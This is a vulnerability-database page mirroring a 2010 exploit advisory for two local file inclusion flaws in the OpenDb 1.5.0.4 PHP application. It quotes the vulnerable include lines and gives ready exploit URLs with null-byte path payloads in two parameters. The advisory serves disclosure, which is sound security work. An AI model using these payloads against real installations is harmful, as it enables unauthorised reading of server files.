OpenDb 1.5.0.4 - Multiple Local File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059086 漏洞类型
发布时间 2010-01-23 更新时间 2010-01-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11240
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
==============================================================================
__ __ __ __ __ __
/ \ / \ \ \ / / / \ / \
/ /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \
/ / \ _ / \ \ \ \/ / / / \ _ / \ \
/_/ \_\ \__/ /_/ \_\

==============================================================================
[»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[»] Script: [ OpenDb ]
[»] Language: [ PHP ]
[»] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[»] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
#~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################